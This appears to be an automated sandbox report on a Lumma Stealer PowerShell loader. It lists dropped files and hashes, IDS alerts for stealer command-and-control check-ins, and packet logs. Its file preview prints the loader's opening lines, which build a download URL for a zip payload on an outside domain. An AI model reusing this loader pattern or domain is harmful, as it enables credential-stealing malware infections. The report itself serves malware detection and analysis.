SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfd2pkkg.lh3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.723033162604546
Encrypted:	false
SSDEEP:	96:1NjqV33CxHSQkvhkvCCtAkuYLdaHHkuYLdaHZ:1cVyy8AkuYIkuYc
MD5:	74D09671C6FEF4700CD6154678CE0237
SHA1:	F4DC29FEECFB3596F349EF7197A1276FE493EF20
SHA-256:	C6EADE3DE405922A1F32F4602FCAB26B69A36B598D9C8032FFD4DBAA4C4E5007
SHA-512:	B2ADAB2DE5E4002B6F58C31EFFA521007134BDBCDF4FF7898FB2FDF94C7BE769222CE83A78D077894007F2AA1CF5C2958B01F8FCCA5E4E3CF0640500E97F1E3B
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.........Y..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....d...Y...o...Y......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.A...........................%..A.p.p.D.a.t.a...B.V.1......Y.A..Roaming.@......CW.^.Y.A..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.B..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................,..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.B....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HJ41T1IMU51P11GG09DF.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.723033162604546
Encrypted:	false
SSDEEP:	96:1NjqV33CxHSQkvhkvCCtAkuYLdaHHkuYLdaHZ:1cVyy8AkuYIkuYc
MD5:	74D09671C6FEF4700CD6154678CE0237
SHA1:	F4DC29FEECFB3596F349EF7197A1276FE493EF20
SHA-256:	C6EADE3DE405922A1F32F4602FCAB26B69A36B598D9C8032FFD4DBAA4C4E5007
SHA-512:	B2ADAB2DE5E4002B6F58C31EFFA521007134BDBCDF4FF7898FB2FDF94C7BE769222CE83A78D077894007F2AA1CF5C2958B01F8FCCA5E4E3CF0640500E97F1E3B
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v.........Y..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....d...Y...o...Y......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.A...........................%..A.p.p.D.a.t.a...B.V.1......Y.A..Roaming.@......CW.^.Y.A..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.B..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`...........................,..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.B....Q...........

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.325334885329717
TrID:
File name:	lumma.ps1
File size:	546 bytes
MD5:	58b145c18d1f4eb4fb62ea55c7453a7c
SHA1:	72318f9c192da3aef8da5fd5e18285f6db38c990
SHA256:	a3da280337b0db1587a58dbbe52e24440688c75c9b4a2777d589b35d8832ae6a
SHA512:	65b23ed00d82a7c246922518b386b5eb52e1d239466fe051d713df686e352595e929da0d1a3aac4728d1db8c1f2d37f6575b3f74b4dd95f5c2968a3cadf36cd9
SSDEEP:	12:tUHMzC71mcIyrn8fzSWw7yTtMxGOr2l5G3PCjt50poEzXMnAqs:GszwHIy+zSd7yTHOylI3PCBY5cU
TLSH:	28F059D3A9FB3520C89193D98A19D69D9827855910785A787BFE30B20873FF58F80DBC
File Content Preview:	$gjoks = "$env:ALLUSERSPROFILE\extract"....if (!(Test-Path $gjoks)) { New-Item -Path $gjoks -ItemType Directory }....$kshua = "$env:ALLUSERSPROFILE\pakgea.zip"....$toska = 'https://druster-master.com/'..$fkfru = 'gogolend1.zip'..$trutis = $toska + $fkfru.

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T09:16:04.232944+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	1	192.168.2.4	49730	104.21.64.85	443	TCP
2024-12-28T09:16:07.695290+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	1	192.168.2.4	49731	172.67.167.249	443	TCP
2024-12-28T09:16:11.538858+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.198.222	443	TCP
2024-12-28T09:16:12.299037+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	172.67.198.222	443	TCP
2024-12-28T09:16:12.299037+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	172.67.198.222	443	TCP
2024-12-28T09:16:13.900016+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	172.67.198.222	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:16:02.501475096 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:02.501532078 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:02.501601934 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:02.515253067 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:02.515275002 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:03.782921076 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:03.782996893 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:03.787885904 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:03.787899017 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:03.788106918 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:03.800138950 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:03.847337961 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.232960939 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.233009100 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.233037949 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.233074903 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.233088017 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.233102083 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.233146906 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.233150959 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.237641096 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.240391016 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.248800993 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.248863935 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.248868942 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.257116079 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.257174969 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.257179022 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.305700064 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.305717945 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.352591991 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.433352947 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.435692072 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.435748100 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.435756922 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.443387032 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.443451881 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.443455935 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.451294899 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.451359034 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.451361895 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.459019899 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.459079027 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.459081888 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.474641085 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.474677086 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.474684954 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.482353926 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.482397079 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.482402086 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.490201950 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.490225077 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.490247011 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.490251064 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.490293026 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.498053074 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.509406090 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.509459019 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.509466887 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.513710976 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.513756990 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.513761044 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.521436930 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.521481991 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.521485090 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.552779913 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.552819014 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.552823067 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.602693081 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.634732962 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.637204885 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.637250900 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.637258053 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.649144888 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.649152994 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.649199009 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.649204969 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.659008026 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.659056902 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.659063101 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.659094095 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.663991928 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.664037943 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.673958063 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.673983097 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.674026012 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.679163933 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.679169893 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.679214954 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.689274073 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.689280033 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.689423084 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.699039936 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.699047089 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.699101925 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.704108953 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.704157114 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.713990927 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.714047909 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.724003077 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.724076033 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.729031086 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.729101896 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.738281012 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.738358021 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.836062908 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.836304903 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.841320992 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.841399908 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.845043898 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.845108986 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.852144957 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.852199078 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.858860016 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.858936071 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.865250111 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.865299940 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.868029118 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.868100882 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.873948097 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.874022961 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.876961946 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.877024889 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.879014969 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.882750034 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.882807016 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.888292074 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.888355970 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.890662909 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.893959999 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.894030094 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.896922112 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.896971941 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.897767067 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.902486086 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.902563095 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.905419111 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.905483007 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.911149025 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.911197901 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.916301012 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.916584015 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.916647911 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.922265053 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.922317982 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.925167084 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.925230026 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.926462889 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.930715084 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.930773020 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.936408997 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.936474085 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.939269066 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.939323902 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.944899082 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:04.944952011 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:04.950604916 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.038311005 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.038364887 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.043068886 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.043129921 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.045588017 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.045629978 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.050254107 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.050307989 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.054841042 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.054908037 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.066725016 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.066732883 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.066761017 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.066797018 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.066801071 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.066833019 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.066854000 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.080949068 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.080977917 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.081003904 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.081007957 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.081046104 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.094470978 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.094491005 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.094531059 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.094533920 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.094579935 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.094599009 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.106708050 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.106723070 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.106795073 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.106798887 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.106839895 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.119741917 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.119755983 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.119834900 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.119838953 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.119880915 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.131076097 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.131091118 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.131150007 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.131154060 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.131323099 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.131484032 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.241271973 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.241288900 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.241413116 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.241419077 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.241462946 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.251532078 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.251555920 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.251645088 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.251653910 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.251699924 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.261288881 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.261322021 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.261379957 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.261384964 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.261424065 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.265338898 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.265408039 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.265412092 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.265425920 CET	443	49730	104.21.64.85	192.168.2.4
Dec 28, 2024 09:16:05.265454054 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.265486956 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.284799099 CET	49730	443	192.168.2.4	104.21.64.85
Dec 28, 2024 09:16:05.640785933 CET	49731	443	192.168.2.4	172.67.167.249
Dec 28, 2024 09:16:05.640825033 CET	443	49731	172.67.167.249	192.168.2.4
Dec 28, 2024 09:16:05.640918970 CET	49731	443	192.168.2.4	172.67.167.249
Dec 28, 2024 09:16:05.642141104 CET	49731	443	192.168.2.4	172.67.167.249
Dec 28, 2024 09:16:05.642152071 CET	443	49731	172.67.167.249	192.168.2.4
Dec 28, 2024 09:16:06.902800083 CET	443	49731	172.67.167.249	192.168.2.4
Dec 28, 2024 09:16:06.902900934 CET	49731	443	192.168.2.4	172.67.167.249
Dec 28, 2024 09:16:06.905728102 CET	49731	443	192.168.2.4	172.67.167.249
Dec 28, 2024 09:16:06.905741930 CET	443	49731	172.67.167.249	192.168.2.4
Dec 28, 2024 09:16:06.905949116 CET	443	49731	172.67.167.249	192.168.2.4
Dec 28, 2024 09:16:06.906913996 CET	49731	443	192.168.2.4	172.67.167.249
Dec 28, 2024 09:16:06.951334953 CET	443	49731	172.67.167.249	192.168.2.4
Dec 28, 2024 09:16:07.695306063 CET	443	49731	172.67.167.249	192.168.2.4
Dec 28, 2024 09:16:07.695425034 CET	443	49731	172.67.167.249	192.168.2.4
Dec 28, 2024 09:16:07.695485115 CET	49731	443	192.168.2.4	172.67.167.249
Dec 28, 2024 09:16:07.827281952 CET	49731	443	192.168.2.4	172.67.167.249
Dec 28, 2024 09:16:10.274311066 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:10.274368048 CET	443	49732	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:10.274485111 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:10.277575016 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:10.277595997 CET	443	49732	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:11.538746119 CET	443	49732	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:11.538857937 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:11.542629004 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:11.542668104 CET	443	49732	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:11.542964935 CET	443	49732	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:11.587004900 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:11.601267099 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:11.601267099 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:11.601383924 CET	443	49732	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:12.298984051 CET	443	49732	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:12.299077988 CET	443	49732	172.67.198.222	192.168.2.4
